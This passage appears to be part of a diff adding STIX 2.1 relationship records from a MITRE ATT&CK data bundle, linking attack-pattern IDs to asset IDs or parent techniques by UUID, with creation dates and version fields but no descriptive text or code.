"attack-pattern--d94b3ae9-8059-4989-8e9f-ea0f601f80a7", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9266111a-38a0-4d84-9f5e-5e5e854ef76d", + "created": "2024-06-26T13:53:28.861Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:53:28.861Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92850170-1509-490f-9e30-eb93639a6417", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9296179c-280a-4342-91f8-64f8b22497b0", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92b119ef-449c-4fca-8fa5-5eca7f22c177", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92b2c1d3-133e-4161-bc1a-74c3b5fdf9f8", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92d317a6-d4fd-49ff-947c-c49b21b390f3", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92d33c7d-8299-4273-91ba-973e8bb40426", + "created": "2024-06-21T14:12:20.270Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.270Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92f1b90a-5849-406d-9006-f15153d8deed", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--92fa00d4-829b-4c5a-94bd-1bc62e225ec4", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9306a3ba-00b9-4eb7-9b8e-2af1fb5eebac", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9309ff9d-f9aa-4ab1-832c-667d1c8e7f6c", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--930a8e44-c542-4cc6-a979-9ca83fd6a0e8", + "created": "2024-06-26T13:54:26.195Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:54:26.195Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9321a544-0bde-4d6d-a197-303b70e39fc3", + "created": "2020-01-17T16:10:58.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d10cbd34-42e3-45c0-84d2-535a09849584", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--934ec08f-f95e-47af-b6fb-cbc90bb579fd", + "created": "2024-06-27T09:42:24.285Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:42:24.285Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93695915-d7a4-4e76-89bf-b9d50d0928e1", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--936ecf2a-f257-4e38-8baf-6ef5b21ad5b8", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--938e29cd-9e9d-4d61-b962-b10c19a235cb", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--938ff1d4-acce-4e4e-8a9c-be62799dff8e", + "created": "2023-09-29T17:38:40.536Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:38:40.536Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9395c820-d828-4dea-bcde-88c4baf06440", + "created": "2020-02-21T21:16:18.148Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", + "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93a14622-1a9d-49d7-82cd-f26793c05531", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93b50bcd-d9d9-4a59-bdda-ee10694e18f7", + "created": "2024-06-27T09:06:46.788Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:06:46.788Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93bd9e0e-2ed7-497a-a80e-cf923c31fef5", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93c336f2-7e7c-4c79-af16-faae03e66121", + "created": "2023-09-29T18:44:09.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:44:09.293Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93e61d3e-37ad-4e47-8b63-14cdcfe521f8", + "created": "2024-07-02T13:55:55.747Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.747Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--93f8861b-a0af-430d-af97-9c6104281510", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94035326-619c-4307-ac07-5def29b85f59", + "created": "2020-01-15T18:02:50.149Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--2ba5aa71-9d15-4b22-b726-56af06d9ad2f", + "target_ref": "attack-pattern--c0dfe7b0-b873-4618-9ff8-53e31f70907f", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94143c58-2ced-47f3-acfe-ea3e8dea1183", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94151e20-554b-4e36-ae5c-7844ba837138", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--942cb687-c354-47a9-b94f-38dbf452a825", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--943a9a5c-7826-451d-ac73-34353ea40595", + "created": "2023-09-29T16:33:36.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:33:36.496Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9441e434-7e2c-4163-abb2-f3c7dab2ea9e", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9443a37d-f385-42a1-9ec4-a2f182cecb4f", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--944b9cc3-95c7-4e0d-8b62-576aa6cf7217", + "created": "2020-02-11T20:34:58.622Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", + "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--946148f5-ac1b-4940-a282-f70431997402", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--94625016-af59-4913-8495-e759e8b00216", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9465374f-e265-4bff-9432-81ddb19ba2ca", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--9467b83c-7589-4770-983b-339726cb8e7e", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--947957a0-4471-44c1-9ead-2ad59943cc04", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--948e7502-dd7d-4148-9819-053585690de1", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + 